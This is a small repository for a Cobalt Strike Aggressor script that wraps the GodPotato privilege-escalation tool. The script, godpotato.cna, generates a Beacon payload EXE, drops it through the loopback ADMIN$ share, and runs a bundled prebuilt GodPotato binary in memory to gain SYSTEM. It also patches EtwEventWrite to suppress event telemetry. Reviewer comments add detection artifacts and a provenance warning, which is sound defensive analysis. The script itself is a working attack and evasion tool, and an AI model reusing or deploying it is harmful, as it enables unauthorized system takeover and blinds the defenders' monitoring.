├── GodPotato-NET4.exe
├── README.md
└── godpotato.cna

/GodPotato-NET4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/weaselsec/GodPotato-Aggressor-Script/HEAD/GodPotato-NET4.exe
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# GodPotato-Aggressor-Script

GodPotato is written by BeichenDream and can be found at https://github.com/BeichenDream/GodPotato.

![image](https://github.com/weaselsec/GodPotato-Agressor-Script/assets/147257425/5bf896a1-3d08-43fb-b86c-ced092572ba6)

--------------------------------------------------------------------------------
/godpotato.cna:
--------------------------------------------------------------------------------
# GodPotato can be found at https://github.com/BeichenDream/GodPotato
# $1 = bid, $2 = listener
# NOTE(review): $3 is forwarded to beacon_link() at the end of the alias but is
# not described here; confirm what callers are expected to pass.
alias godpotato {
    # Registers the Beacon console alias "godpotato". As written it logs the
    # task, builds a payload EXE for listener $2, writes it to the loopback
    # ADMIN$ share, runs the bundled GodPotato-NET4.exe through
    # bexecute_assembly with "-cmd <dropped EXE>", then calls beacon_link.
    #
    # Artifacts visible from this code, useful for detection and forensics:
    #   - a new .exe created via \\127.0.0.1\ADMIN$ whose name is one of three
    #     fixed prefixes (d612, t5op, 5d2d) followed by a number from rand(100);
    #   - nothing in this alias deletes that file afterwards, so it stays on disk;
    #   - a memory-patch directive on the bexecute_assembly call (see below).

    btask($1, "Tasked Beacon to escalate to SYSTEM");
    # Pick a file name: random prefix from the list, then rand(100), then ".exe".
    $name = rand(@("d612", "t5op", "5d2d")) . rand(100) . ".exe";

    # Generate the payload EXE for listener $2. The architecture is hard-coded
    # to "x64" in this call; the earlier remark about $arch being supplied via
    # &lambda does not match the code shown here and appears to be left over.
    $exedata = artifact_payload($2, "exe", "x64", "process", "Indirect");

    # Upload the EXE through the loopback ADMIN$ share under the name chosen above.
    bupload_raw!($1, "\\\\127.0.0.1\\ADMIN\$\\ $+ $name", $exedata);

    # Run GodPotato-NET4.exe, loaded from the script's own directory via
    # script_resource(), with -cmd pointing at the uploaded EXE.
    # NOTE(review): that binary is shipped prebuilt in this repository and the
    # page gives no hash or build provenance for it; build it from the upstream
    # source and compare before trusting the copy bundled here.
    # The fourth argument looks like a memory-patch directive: ntdll.dll,
    # EtwEventWrite, offset 0, bytes C3 00. C3 is the x86 RET opcode, so events
    # written through EtwEventWrite in the process hosting the assembly would
    # presumably be dropped. Monitoring that relies only on in-process ETW
    # providers will miss this stage; telemetry collected outside that process
    # (file creation under ADMIN$, process creation) does not depend on it.
    bexecute_assembly($1, script_resource("GodPotato-NET4.exe"), "-cmd \\\\127.0.0.1\\ADMIN\$\\ $+ $name $+ ","PATCHES:ntdll.dll,EtwEventWrite,0,C300");
    # Link to the new payload (relevant when the listener is an SMB or TCP Beacon).
    beacon_link($1, $2, $3);
}
--------------------------------------------------------------------------------